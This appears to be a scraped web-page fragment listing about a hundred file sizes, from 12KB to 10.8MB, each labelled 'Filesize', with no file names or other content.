172KB
-
Filesize
260KB
-
Filesize
1.8MB
-
Filesize
1.3MB
-
Filesize
680KB
-
Filesize
10.8MB
-
Filesize
1.3MB
-
Filesize
1.6MB
-
Filesize
72KB
-
Filesize
756KB
-
Filesize
632KB
-
Filesize
680KB
-
Filesize
1.4MB
-
Filesize
156KB
-
Filesize
172KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
128KB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
128KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
144KB
-
Filesize
10.8MB
-
Filesize
236KB
-
Filesize
1.8MB
-
Filesize
632KB
-
Filesize
756KB
-
Filesize
1.6MB
-
Filesize
72KB
-
Filesize
680KB
-
Filesize
10.8MB
-
Filesize
1.8MB
-
Filesize
172KB
-
Filesize
10.8MB
-
Filesize
1.3MB
-
Filesize
260KB
-
Filesize
1.8MB
-
Filesize
10.8MB
-
Filesize
156KB
-
Filesize
212KB
-
Filesize
1.0MB
-
Filesize
428KB
-
Filesize
1.8MB
-
Filesize
10.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
128KB
-
Filesize
7.8MB
-
Filesize
128KB
-
Filesize
1.8MB
-
Filesize
156KB
-
Filesize
1.6MB
-
Filesize
1.8MB
-
Filesize
756KB
-
Filesize
1.8MB
-
Filesize
10.8MB
-
Filesize
172KB
-
Filesize
260KB
-
Filesize
10.8MB
-
Filesize
72KB
-
Filesize
1.8MB
-
Filesize
680KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
1.3MB
-
Filesize
632KB
-
Filesize
1.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
1.8MB
-
Filesize
1.8MB
-
Filesize
260KB
-
Filesize
680KB
-
Filesize
1.8MB
-
Filesize
632KB
-
Filesize
72KB
-
Filesize
756KB
-
Filesize
1.6MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
172KB
-
Filesize
10.8MB
-
Filesize
1.3MB
-
Filesize
1.8MB
-
Filesize
260KB
-
Filesize
220KB
-
Filesize
1024KB
-
Filesize
12KB
-
Filesize
10.8MB
-
Filesize
7.8MB